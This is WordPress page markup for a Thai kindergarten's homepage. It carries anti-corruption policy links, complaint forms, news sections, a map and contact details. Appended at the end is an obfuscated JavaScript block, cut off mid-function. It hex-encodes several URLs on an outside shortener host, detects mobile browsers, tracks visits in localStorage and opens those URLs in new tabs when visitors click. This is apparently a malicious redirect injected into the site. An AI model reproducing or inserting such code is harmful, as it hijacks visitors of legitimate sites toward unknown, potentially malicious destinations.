200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://www.facebook.com/share/p/sdXD4yi68yYAMbpR/\" data-type=\"link\" data-id=\"https://www.facebook.com/share/p/sdXD4yi68yYAMbpR/\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const 